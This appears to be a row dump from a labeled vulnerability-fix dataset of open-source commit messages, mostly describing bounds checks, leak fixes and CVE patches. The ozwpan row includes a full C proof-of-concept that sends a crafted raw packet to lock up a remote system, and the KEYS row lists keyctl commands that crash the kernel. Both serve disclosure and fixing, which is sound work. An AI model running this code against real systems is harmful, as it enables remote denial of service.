commit_msg
stringlengths 1
24.2k
| commit_hash
stringlengths 2
84
⌀ | project
stringlengths 2
40
| source
stringclasses 4
values | labels
int64 0
1
| repo_url
stringlengths 26
70
⌀ | commit_url
stringlengths 74
118
⌀ | commit_date
stringlengths 25
25
⌀ |
---|---|---|---|---|---|---|---|
scsi-disk: commonize iovec creation between reads and writes
Also, consistently use qiov.size instead of iov.iov_len.
Signed-off-by: Paolo Bonzini <[email protected]>
Signed-off-by: Kevin Wolf <[email protected]> | 103b40f51e4012b3b0ad20f615562a1806d7f49a | qemu | bigvul | 1 | null | null | null |
KEYS: Fix crash when attempt to garbage collect an uninstantiated keyring
The following sequence of commands:
i=`keyctl add user a a @s`
keyctl request2 keyring foo bar @t
keyctl unlink $i @s
tries to invoke an upcall to instantiate a keyring if one doesn't already
exist by that name within the user's keyring set. However, if the upcall
fails, the code sets keyring->type_data.reject_error to -ENOKEY or some
other error code. When the key is garbage collected, the key destroy
function is called unconditionally and keyring_destroy() uses list_empty()
on keyring->type_data.link - which is in a union with reject_error.
Subsequently, the kernel tries to unlink the keyring from the keyring names
list - which oopses like this:
BUG: unable to handle kernel paging request at 00000000ffffff8a
IP: [<ffffffff8126e051>] keyring_destroy+0x3d/0x88
...
Workqueue: events key_garbage_collector
...
RIP: 0010:[<ffffffff8126e051>] keyring_destroy+0x3d/0x88
RSP: 0018:ffff88003e2f3d30 EFLAGS: 00010203
RAX: 00000000ffffff82 RBX: ffff88003bf1a900 RCX: 0000000000000000
RDX: 0000000000000000 RSI: 000000003bfc6901 RDI: ffffffff81a73a40
RBP: ffff88003e2f3d38 R08: 0000000000000152 R09: 0000000000000000
R10: ffff88003e2f3c18 R11: 000000000000865b R12: ffff88003bf1a900
R13: 0000000000000000 R14: ffff88003bf1a908 R15: ffff88003e2f4000
...
CR2: 00000000ffffff8a CR3: 000000003e3ec000 CR4: 00000000000006f0
...
Call Trace:
[<ffffffff8126c756>] key_gc_unused_keys.constprop.1+0x5d/0x10f
[<ffffffff8126ca71>] key_garbage_collector+0x1fa/0x351
[<ffffffff8105ec9b>] process_one_work+0x28e/0x547
[<ffffffff8105fd17>] worker_thread+0x26e/0x361
[<ffffffff8105faa9>] ? rescuer_thread+0x2a8/0x2a8
[<ffffffff810648ad>] kthread+0xf3/0xfb
[<ffffffff810647ba>] ? kthread_create_on_node+0x1c2/0x1c2
[<ffffffff815f2ccf>] ret_from_fork+0x3f/0x70
[<ffffffff810647ba>] ? kthread_create_on_node+0x1c2/0x1c2
Note the value in RAX. This is a 32-bit representation of -ENOKEY.
The solution is to only call ->destroy() if the key was successfully
instantiated.
Reported-by: Dmitry Vyukov <[email protected]>
Signed-off-by: David Howells <[email protected]>
Tested-by: Dmitry Vyukov <[email protected]> | f05819df10d7b09f6d1eb6f8534a8f68e5a4fe61 | linux | bigvul | 1 | null | null | null |
sg_start_req(): use import_iovec()
Signed-off-by: Al Viro <[email protected]> | fdc81f45e9f57858da6351836507fbcf1b7583ee | linux | bigvul | 1 | null | null | null |
ozwpan: unchecked signed subtraction leads to DoS
The subtraction here was using a signed integer and did not have any
bounds checking at all. This commit adds proper bounds checking, made
easy by use of an unsigned integer. This way, a single packet won't be
able to remotely trigger a massive loop, locking up the system for a
considerable amount of time. A PoC follows below, which requires
ozprotocol.h from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
struct oz_elt oz_elt2;
struct oz_multiple_fixed oz_multiple_fixed;
} __packed packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 0,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
},
.oz_elt2 = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_multiple_fixed) - 3
},
.oz_multiple_fixed = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_USB_ENDPOINT_DATA,
.endpoint = 0,
.format = OZ_DATA_F_MULTIPLE_FIXED,
.unit_size = 1,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <[email protected]>
Acked-by: Dan Carpenter <[email protected]>
Cc: stable <[email protected]>
Signed-off-by: Greg Kroah-Hartman <[email protected]> | 9a59029bc218b48eff8b5d4dde5662fd79d3e1a8 | linux | bigvul | 1 | null | null | null |
0.16.1: fix for dcraw ljpeg_start() vulnerability | 4606c28f494a750892c5c1ac7903e62dd1c6fdb5 | rawstudio | bigvul | 1 | null | null | null |
dcache: Handle escaped paths in prepend_path
A rename can result in a dentry that by walking up d_parent
will never reach it's mnt_root. For lack of a better term
I call this an escaped path.
prepend_path is called by four different functions __d_path,
d_absolute_path, d_path, and getcwd.
__d_path only wants to see paths are connected to the root it passes
in. So __d_path needs prepend_path to return an error.
d_absolute_path similarly wants to see paths that are connected to
some root. Escaped paths are not connected to any mnt_root so
d_absolute_path needs prepend_path to return an error greater
than 1. So escaped paths will be treated like paths on lazily
unmounted mounts.
getcwd needs to prepend "(unreachable)" so getcwd also needs
prepend_path to return an error.
d_path is the interesting hold out. d_path just wants to print
something, and does not care about the weird cases. Which raises
the question what should be printed?
Given that <escaped_path>/<anything> should result in -ENOENT I
believe it is desirable for escaped paths to be printed as empty
paths. As there are not really any meaninful path components when
considered from the perspective of a mount tree.
So tweak prepend_path to return an empty path with an new error
code of 3 when it encounters an escaped path.
Signed-off-by: "Eric W. Biederman" <[email protected]>
Signed-off-by: Al Viro <[email protected]> | cde93be45a8a90d8c264c776fab63487b5038a65 | linux | bigvul | 1 | null | null | null |
switch pipe_read() to copy_page_to_iter()
Signed-off-by: Al Viro <[email protected]> | 637b58c2887e5e57850865839cc75f59184b23d1 | linux | bigvul | 1 | null | null | null |
udf: Verify symlink size before loading it
UDF specification allows arbitrarily large symlinks. However we support
only symlinks at most one block large. Check the length of the symlink
so that we don't access memory beyond end of the symlink block.
CC: [email protected]
Reported-by: Carl Henrik Lunde <[email protected]>
Signed-off-by: Jan Kara <[email protected]> | a1d47b262952a45aae62bd49cfaf33dd76c11a2c | linux | bigvul | 1 | null | null | null |
Fix various certificate fingerprint issues.
By using non-DER or invalid encodings outside the signed portion of a
certificate the fingerprint can be changed without breaking the signature.
Although no details of the signed portion of the certificate can be changed
this can cause problems with some applications: e.g. those using the
certificate fingerprint for blacklists.
1. Reject signatures with non zero unused bits.
If the BIT STRING containing the signature has non zero unused bits reject
the signature. All current signature algorithms require zero unused bits.
2. Check certificate algorithm consistency.
Check the AlgorithmIdentifier inside TBS matches the one in the
certificate signature. NB: this will result in signature failure
errors for some broken certificates.
3. Check DSA/ECDSA signatures use DER.
Reencode DSA/ECDSA signatures and compare with the original received
signature. Return an error if there is a mismatch.
This will reject various cases including garbage after signature
(thanks to Antti Karjalainen and Tuomo Untinen from the Codenomicon CROSS
program for discovering this case) and use of BER or invalid ASN.1 INTEGERs
(negative or with leading zeroes).
CVE-2014-8275
Reviewed-by: Emilia Käsper <[email protected]> | 684400ce192dac51df3d3e92b61830a6ef90be3e | openssl | bigvul | 1 | null | null | null |
Fix crash in dtls1_get_record whilst in the listen state where you get two
separate reads performed - one for the header and one for the body of the
handshake record.
CVE-2014-3571
Reviewed-by: Matt Caswell <[email protected]> | feba02f3919495e1b960c33ba849e10e77d0785d | openssl | bigvul | 1 | null | null | null |
* libtiff/tif_predic.c: fix memory leaks in error code paths added in
previous commit (fix for MSVR 35105) | 6a984bf7905c6621281588431f384e79d11a2e33 | libtiff | bigvul | 1 | null | null | null |
Merge branch 'PHP-5.6' into PHP-7.0 | c18263e0e0769faee96a5d0ee04b750c442783c6 | libgd | bigvul | 1 | null | null | null |
Cast to size_t before multiplication
Need to cast to size_t before multiplication otherwise overflow check is useless. | ef01f18dfc6780b776d0674ed3e7415c6ef54d24 | openjpeg | bigvul | 1 | null | null | null |
bug #248, fix Out-Of-Bounds Read in read_image_tga | 3c2b605d72e8b080dace1d98a6e50b46c1d12186 | libgd | bigvul | 1 | null | null | null |
Bug#24388746: PRIVILEGE ESCALATION AND RACE CONDITION USING CREATE TABLE
During REPAIR TABLE of a MyISAM table, a temporary data file (.TMD)
is created. When repair finishes, this file is renamed to the original
.MYD file. The problem was that during this rename, we copied the
stats from the old file to the new file with chmod/chown. If a user
managed to replace the temporary file before chmod/chown was executed,
it was possible to get an arbitrary file with the privileges of the
mysql user.
This patch fixes the problem by not copying stats from the old
file to the new file. This is not needed as the new file was
created with the correct stats. This fix only changes server
behavior - external utilities such as myisamchk still does
chmod/chown.
No test case provided since the problem involves synchronization
with file system operations. | 4e5473862e6852b0f3802b0cd0c6fa10b5253291 | server | bigvul | 1 | null | null | null |
vfs: add vfs_select_inode() helper
Signed-off-by: Miklos Szeredi <[email protected]>
Cc: <[email protected]> # v4.2+ | 54d5ca871e72f2bb172ec9323497f01cd5091ec7 | linux | bigvul | 1 | null | null | null |
Improve checking of EXIF profile to prevent integer overflow (bug report from Ibrahim el-sayed) | d8ab7f046587f2e9f734b687ba7e6e10147c294b | imagemagick | bigvul | 1 | null | null | null |
Ensure image extent does not exceed maximum | fc43974d34318c834fbf78570ca1a3764ed8c7d7 | imagemagick | bigvul | 1 | null | null | null |
Set pixel cache to undefined if any resource limit is exceeded | aecd0ada163a4d6c769cec178955d5f3e9316f2f | imagemagick | bigvul | 1 | null | null | null |
KVM: PPC: Book3S HV: Pull out TM state save/restore into separate procedures
This moves the transactional memory state save and restore sequences
out of the guest entry/exit paths into separate procedures. This is
so that these sequences can be used in going into and out of nap
in a subsequent patch.
The only code changes here are (a) saving and restore LR on the
stack, since these new procedures get called with a bl instruction,
(b) explicitly saving r1 into the PACA instead of assuming that
HSTATE_HOST_R1(r13) is already set, and (c) removing an unnecessary
and redundant setting of MSR[TM] that should have been removed by
commit 9d4d0bdd9e0a ("KVM: PPC: Book3S HV: Add transactional memory
support", 2013-09-24) but wasn't.
Cc: [email protected] # v3.15+
Signed-off-by: Paul Mackerras <[email protected]> | f024ee098476a3e620232e4a78cfac505f121245 | linux | bigvul | 1 | null | null | null |
Don't treat the packet length as unsigned.
The scanf family of functions are as annoyingly bad at handling unsigned
numbers as strtoul() is - both of them are perfectly willing to accept a
value beginning with a negative sign as an unsigned value. When using
strtoul(), you can compensate for this by explicitly checking for a '-'
as the first character of the string, but you can't do that with
sscanf().
So revert to having pkt_len be signed, and scanning it with %d, but
check for a negative value and fail if we see a negative value.
Bug: 12396
Change-Id: I54fe8f61f42c32b5ef33da633ece51bbcda8c95f
Reviewed-on: https://code.wireshark.org/review/15220
Reviewed-by: Guy Harris <[email protected]> | 11edc83b98a61e890d7bb01855389d40e984ea82 | wireshark | bigvul | 1 | null | null | null |
Fix packet length handling.
Treat the packet length as unsigned - it shouldn't be negative in the
file. If it is, that'll probably cause the sscanf to fail, so we'll
report the file as bad.
Check it against WTAP_MAX_PACKET_SIZE to make sure we don't try to
allocate a huge amount of memory, just as we do in other file readers.
Use the now-validated packet size as the length in
ws_buffer_assure_space(), so we are certain to have enough space, and
don't allocate too much space.
Merge the header and packet data parsing routines while we're at it.
Bug: 12395
Change-Id: Ia70f33b71ff28451190fcf144c333fd1362646b2
Reviewed-on: https://code.wireshark.org/review/15172
Reviewed-by: Guy Harris <[email protected]> | f5ec0afb766f19519ea9623152cca3bbe2229500 | wireshark | bigvul | 1 | null | null | null |
Fix packet length handling.
Treat the packet length as unsigned - it shouldn't be negative in the
file. If it is, that'll probably cause the sscanf to fail, so we'll
report the file as bad.
Check it against WTAP_MAX_PACKET_SIZE to make sure we don't try to
allocate a huge amount of memory, just as we do in other file readers.
Use the now-validated packet size as the length in
ws_buffer_assure_space(), so we are certain to have enough space, and
don't allocate too much space.
Bug: 12394
Change-Id: Ifa023ce70f7a2697bf151009b035a6e6cf8d5d90
Reviewed-on: https://code.wireshark.org/review/15169
Reviewed-by: Guy Harris <[email protected]> | 5efb45231671baa2db2011d8f67f9d6e72bc455b | wireshark | bigvul | 1 | null | null | null |
ALSA: timer: Fix leak in events via snd_timer_user_ccallback
The stack object “r1” has a total size of 32 bytes. Its field
“event” and “val” both contain 4 bytes padding. These 8 bytes
padding bytes are sent to user without being initialized.
Signed-off-by: Kangjie Lu <[email protected]>
Signed-off-by: Takashi Iwai <[email protected]> | 9a47e9cff994f37f7f0dbd9ae23740d0f64f9fe6 | linux | bigvul | 1 | null | null | null |
usbnet: cleanup after bind() in probe()
In case bind() works, but a later error forces bailing
in probe() in error cases work and a timer may be scheduled.
They must be killed. This fixes an error case related to
the double free reported in
http://www.spinics.net/lists/netdev/msg367669.html
and needs to go on top of Linus' fix to cdc-ncm.
Signed-off-by: Oliver Neukum <[email protected]>
Signed-off-by: David S. Miller <[email protected]> | 1666984c8625b3db19a9abc298931d35ab7bc64b | linux | bigvul | 1 | null | null | null |
libndb: reject redirect and router advertisements from non-link-local
RFC4861 suggests that these messages should only originate from
link-local addresses in 6.1.2 (RA) and 8.1. (redirect):
Mitigates CVE-2016-3698.
Signed-off-by: Lubomir Rintel <[email protected]>
Signed-off-by: Jiri Pirko <[email protected]> | 2af9a55b38b55abbf05fd116ec097d4029115839 | libndp | bigvul | 1 | null | null | null |
ecryptfs: don't allow mmap when the lower fs doesn't support it
There are legitimate reasons to disallow mmap on certain files, notably
in sysfs or procfs. We shouldn't emulate mmap support on file systems
that don't offer support natively.
CVE-2016-1583
Signed-off-by: Jeff Mahoney <[email protected]>
Cc: [email protected]
[tyhicks: clean up f_op check by using ecryptfs_file_to_lower()]
Signed-off-by: Tyler Hicks <[email protected]> | f0fe970df3838c202ef6c07a4c2b36838ef0a88b | linux | bigvul | 1 | null | null | null |
ecryptfs: forbid opening files without mmap handler
This prevents users from triggering a stack overflow through a recursive
invocation of pagefault handling that involves mapping procfs files into
virtual memory.
Signed-off-by: Jann Horn <[email protected]>
Acked-by: Tyler Hicks <[email protected]>
Cc: [email protected]
Signed-off-by: Linus Torvalds <[email protected]> | 2f36db71009304b3f0b95afacd8eba1f9f046b87 | linux | bigvul | 1 | null | null | null |
ext2: convert to mbcache2
The conversion is generally straightforward. We convert filesystem from
a global cache to per-fs one. Similarly to ext4 the tricky part is that
xattr block corresponding to found mbcache entry can get freed before we
get buffer lock for that block. So we have to check whether the entry is
still valid after getting the buffer lock.
Signed-off-by: Jan Kara <[email protected]>
Signed-off-by: Theodore Ts'o <[email protected]> | be0726d33cb8f411945884664924bed3cb8c70ee | linux | bigvul | 1 | null | null | null |
ext4: convert to mbcache2
The conversion is generally straightforward. The only tricky part is
that xattr block corresponding to found mbcache entry can get freed
before we get buffer lock for that block. So we have to check whether
the entry is still valid after getting buffer lock.
Signed-off-by: Jan Kara <[email protected]>
Signed-off-by: Theodore Ts'o <[email protected]> | 82939d7999dfc1f1998c4b1c12e2f19edbdff272 | linux | bigvul | 1 | null | null | null |
Do not consider a CR by itself as a valid line terminator
Varnish (prior to version 4.0) was not following the standard with
regard to line separator.
Spotted and analyzed by: Régis Leroy [regilero] [email protected] | 85e8468bec9416bd7e16b0d80cb820ecd2b330c3 | varnish-cache | bigvul | 1 | null | null | null |
aio: lift iov_iter_init() into aio_setup_..._rw()
the only non-trivial detail is that we do it before rw_verify_area(),
so we'd better cap the length ourselves in aio_setup_single_rw()
case (for vectored case rw_copy_check_uvector() will do that for us).
Signed-off-by: Al Viro <[email protected]> | 4c185ce06dca14f5cea192f5a2c981ef50663f2b | linux | bigvul | 1 | null | null | null |
Fixed bug #72227: imagescale out-of-bounds read
Ported from https://github.com/libgd/libgd/commit/4f65a3e4eedaffa1efcf9ee1eb08f0b504fbc31a | 7a1aac3343af85b4af4df5f8844946eaa27394ab?w=1 | libgd | bigvul | 1 | null | null | null |
ALSA: timer: Fix race between read and ioctl
The read from ALSA timer device, the function snd_timer_user_tread(),
may access to an uninitialized struct snd_timer_user fields when the
read is concurrently performed while the ioctl like
snd_timer_user_tselect() is invoked. We have already fixed the races
among ioctls via a mutex, but we seem to have forgotten the race
between read vs ioctl.
This patch simply applies (more exactly extends the already applied
range of) tu->ioctl_lock in snd_timer_user_tread() for closing the
race window.
Reported-by: Alexander Potapenko <[email protected]>
Tested-by: Alexander Potapenko <[email protected]>
Cc: <[email protected]>
Signed-off-by: Takashi Iwai <[email protected]> | d11662f4f798b50d8c8743f433842c3e40fe3378 | linux | bigvul | 1 | null | null | null |
KVM: VMX: Do not BUG() on out-of-bounds guest IRQ
The value of the guest_irq argument to vmx_update_pi_irte() is
ultimately coming from a KVM_IRQFD API call. Do not BUG() in
vmx_update_pi_irte() if the value is out-of bounds. (Especially,
since KVM as a whole seems to hang after that.)
Instead, print a message only once if we find that we don't have a
route for a certain IRQ (which can be out-of-bounds or within the
array).
This fixes CVE-2017-1000252.
Fixes: efc644048ecde54 ("KVM: x86: Update IRTE for posted-interrupts")
Signed-off-by: Jan H. Schönherr <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]> | 3a8b0677fc6180a467e26cc32ce6b0c09a32f9bb | linux | bigvul | 1 | null | null | null |
Extend build-id reporting to 8-byte IDs that lld can generate (Ed Maste) | 9611f31313a93aa036389c5f3b15eea53510d4d | file | bigvul | 1 | null | null | null |
Fix parser rule for 'backof' and 'frontof' | aa9156006e88565e1f1a5f7cc088b18322d57536 | php-src | bigvul | 1 | null | null | null |
https://github.com/ImageMagick/ImageMagick/issues/851 | e04cf3e9524f50ca336253513d977224e083b816 | imagemagick | bigvul | 1 | null | null | null |
USB: serial: console: fix use-after-free on disconnect
A clean-up patch removing two redundant NULL-checks from the console
disconnect handler inadvertently also removed a third check. This could
lead to the struct usb_serial being prematurely freed by the console
code when a driver accepts but does not register any ports for an
interface which also lacks endpoint descriptors.
Fixes: 0e517c93dc02 ("USB: serial: console: clean up sanity checks")
Cc: stable <[email protected]> # 4.11
Reported-by: Andrey Konovalov <[email protected]>
Acked-by: Greg Kroah-Hartman <[email protected]>
Signed-off-by: Johan Hovold <[email protected]> | bd998c2e0df0469707503023d50d46cf0b10c787 | linux | bigvul | 1 | null | null | null |
Fix #8764 differently since ptr diff might not fit in ptrdiff_t | d21e91f075a7a7a8ed23baa5c1bb1fac48313882 | radare2 | bigvul | 1 | null | null | null |
Fix #8764 a 3rd time since 2nd time is UB and can be optimized away | fbaf24bce7ea4211e4608b3ab6c1b45702cb243d | radare2 | bigvul | 1 | null | null | null |
packet: hold bind lock when rebinding to fanout hook
Packet socket bind operations must hold the po->bind_lock. This keeps
po->running consistent with whether the socket is actually on a ptype
list to receive packets.
fanout_add unbinds a socket and its packet_rcv/tpacket_rcv call, then
binds the fanout object to receive through packet_rcv_fanout.
Make it hold the po->bind_lock when testing po->running and rebinding.
Else, it can race with other rebind operations, such as that in
packet_set_ring from packet_rcv to tpacket_rcv. Concurrent updates
can result in a socket being added to a fanout group twice, causing
use-after-free KASAN bug reports, among others.
Reported independently by both trinity and syzkaller.
Verified that the syzkaller reproducer passes after this patch.
Fixes: dc99f600698d ("packet: Add fanout support.")
Reported-by: nixioaming <[email protected]>
Signed-off-by: Willem de Bruijn <[email protected]>
Signed-off-by: David S. Miller <[email protected]> | 008ba2a13f2d04c947adc536d19debb8fe66f110 | linux | bigvul | 1 | null | null | null |
release: prepare for 3.23.90 | bc919205bf774f6af3fa7154506c46039af5a69b | nautilus | bigvul | 1 | null | null | null |
Slightly different fix for #714 | 04a567494786d5bb50894fc8bb8fea0cf496bea8 | imagemagick | bigvul | 1 | null | null | null |
Only return VERIFY_FAILED from a single point
Everything else is a fatal error. Also improve documentation about that for
the vrfy callback. | 31458a18788b0cf0b722acda9bb2f2fe13a3fb32 | mbedtls | bigvul | 1 | null | null | null |
CVE-2017-13725/IPv6 R.H.: Add a capture file.
This is from Kamil Frankowicz testing an existing fix.
This is a test for the print-rt6.c fix I made after inspecting the code. | c7c515ee03c285cc51376328de4ae9d549e501a5 | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-13687/CHDLC: Improve bounds and length checks.
Prevent a possible buffer overread in chdlc_print() and replace the
custom check in chdlc_if_print() with a standard check in chdlc_print()
so that the latter certainly does not over-read even when reached via
juniper_chdlc_print(). Add length checks. | a1eefe986065846b6c69dbc09afd9fa1a02c4a3d | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-13028/BOOTP: Add a bounds check before fetching data
This fixes a buffer over-read discovered by Bhargava Shastry,
SecT/TU Berlin.
Add a test using the capture file supplied by the reporter(s), modified
so the capture file won't cause 'tcpdump: pcap_loop: truncated dump file' | 29e5470e6ab84badbc31f4532bb7554a796d9d52 | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-13024/IPv6 mobility: Add another test for a previous bounds check fix
This is another capture file supplied by Bhargava Shastry, modified
so the capture file won't cause 'tcpdump: pcap_loop: truncated dump file' | 2e1f6d9320afa83abc1ff716c7981fa504edadf2 | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-13020/VTP: Add another test.
A capture file supplied by Bhargava Shastry, modified so the capture
file won't be rejected as an invalid capture. | d692d67332bcc90540088ad8e725eb3279e39863 | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-13004/Juniper: Add a bounds check.
This fixes a buffer over-read discovered by Forcepoint's security
researchers Otto Airamo & Antti Levomäki.
Add tests using the capture files supplied by the reporter(s). | 42073d54c53a496be40ae84152bbfe2c923ac7bc | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-13000/IEEE 802.15.4: Add more bounds checks.
While we're at it, add a bunch of macros for the frame control field's
subfields, have the reserved frame types show the frame type value, use
the same code path for processing source and destination addresses
regardless of whether -v was specified (just leave out the addresses in
non-verbose mode), and return the header length in all cases.
This fixes a buffer over-read discovered by Forcepoint's security
researchers Otto Airamo & Antti Levomäki.
Add tests using the capture files supplied by the reporter(s). | 9be4e0b5938b705e7e36cfcb110a740c6ff0cb97 | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-13000/IEEE 802.15.4: Fix bug introduced by previous fix.
We've already advanced the pointer past the PAN ID, if present; it now
points to the address, so don't add 2 to it.
This fixes a buffer over-read discovered by Forcepoint's security
researchers Otto Airamo & Antti Levomäki.
Add a test using the capture file supplied by the reporter(s). | a7e5f58f402e6919ec444a57946bade7dfd6b184 | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-12987/IEEE 802.11: Fix processing of TIM IE.
The arguments to memcpy() were completely wrong.
This fixes a buffer over-read discovered by Kamil Frankowicz.
Add a test using the capture file supplied by Brian 'geeknik' Carpenter. | 99798bd9a41bd3d03fdc1e949810a38967f20ed3 | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-12902/Zephyr: Add an additional test.
File from Kamil Frankowicz. | 6ec0c6fa63412c7a07a5bcb790a529c3563b4173 | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-12899/DECnet: Fix bounds checking.
If we're skipping over padding before the *real* flags, check whether
the real flags are in the captured data before fetching it. This fixes
a buffer over-read discovered by Kamil Frankowicz.
Note one place where we don't need to do bounds checking as it's already
been done.
Add a test using the capture file supplied by the reporter(s). | c6e0531b5def26ecf912e8de6ade86cbdaed3751 | tcpdump | bigvul | 1 | null | null | null |
CVE-2017-12896/ISAKMP: Do bounds checks in isakmp_rfc3948_print().
This fixes a buffer over-read discovered by Kamil Frankowicz.
Add a test using the capture file supplied by the reporter(s). | f76e7feb41a4327d2b0978449bbdafe98d4a3771 | tcpdump | bigvul | 1 | null | null | null |
configure.ac: use /run/nagios.lock as the default lockfile path.
The previous default path for the lockfile was located in
$localstatedir, which is generally writable by the nagios user. That
presents a security risk, since the nagios user can delete the
lockfile and replace it with another file containing the PID of a
root-owned process. This commit changes the default lockfile path to
/run/nagios.lock, and completes the fix for Github issue #404. | 3baffa78bafebbbdf9f448890ba5a952ea2d73cb | nagioscore | bigvul | 1 | null | null | null |
imapd: check for isadmin BEFORE parsing sync lines | 53c4137bd924b954432c6c59da7572c4c5ffa901 | cyrus-imapd | bigvul | 1 | null | null | null |
more bio_map_user_iov() leak fixes
we need to take care of failure exit as well - pages already
in bio should be dropped by analogue of bio_unmap_pages(),
since their refcounts had been bumped only once per reference
in bio.
Cc: [email protected]
Signed-off-by: Al Viro <[email protected]> | 2b04e8f6bbb196cab4b232af0f8d48ff2c7a8058 | linux | bigvul | 1 | null | null | null |
Namespace: fix operand cache leak
I found some ACPI operand cache leaks in ACPI early abort cases.
Boot log of ACPI operand cache leak is as follows:
>[ 0.174332] ACPI: Added _OSI(Module Device)
>[ 0.175504] ACPI: Added _OSI(Processor Device)
>[ 0.176010] ACPI: Added _OSI(3.0 _SCP Extensions)
>[ 0.177032] ACPI: Added _OSI(Processor Aggregator Device)
>[ 0.178284] ACPI: SCI (IRQ16705) allocation failed
>[ 0.179352] ACPI Exception: AE_NOT_ACQUIRED, Unable to install
System Control Interrupt handler (20160930/evevent-131)
>[ 0.180008] ACPI: Unable to start the ACPI Interpreter
>[ 0.181125] ACPI Error: Could not remove SCI handler
(20160930/evmisc-281)
>[ 0.184068] kmem_cache_destroy Acpi-Operand: Slab cache still has
objects
>[ 0.185358] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 4.10.0-rc3 #2
>[ 0.186820] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS
VirtualBox 12/01/2006
>[ 0.188000] Call Trace:
>[ 0.188000] ? dump_stack+0x5c/0x7d
>[ 0.188000] ? kmem_cache_destroy+0x224/0x230
>[ 0.188000] ? acpi_sleep_proc_init+0x22/0x22
>[ 0.188000] ? acpi_os_delete_cache+0xa/0xd
>[ 0.188000] ? acpi_ut_delete_caches+0x3f/0x7b
>[ 0.188000] ? acpi_terminate+0x5/0xf
>[ 0.188000] ? acpi_init+0x288/0x32e
>[ 0.188000] ? __class_create+0x4c/0x80
>[ 0.188000] ? video_setup+0x7a/0x7a
>[ 0.188000] ? do_one_initcall+0x4e/0x1b0
>[ 0.188000] ? kernel_init_freeable+0x194/0x21a
>[ 0.188000] ? rest_init+0x80/0x80
>[ 0.188000] ? kernel_init+0xa/0x100
>[ 0.188000] ? ret_from_fork+0x25/0x30
When early abort is occurred due to invalid ACPI information, Linux kernel
terminates ACPI by calling AcpiTerminate() function. The function calls
AcpiNsTerminate() function to delete namespace data and ACPI operand cache
(AcpiGbl_ModuleCodeList).
But the deletion code in AcpiNsTerminate() function is wrapped in
ACPI_EXEC_APP definition, therefore the code is only executed when the
definition exists. If the define doesn't exist, ACPI operand cache
(AcpiGbl_ModuleCodeList) is leaked, and stack dump is shown in kernel log.
This causes a security threat because the old kernel (<= 4.9) shows memory
locations of kernel functions in stack dump, therefore kernel ASLR can be
neutralized.
To fix ACPI operand leak for enhancing security, I made a patch which
removes the ACPI_EXEC_APP define in AcpiNsTerminate() function for
executing the deletion code unconditionally.
Signed-off-by: Seunghun Han <[email protected]>
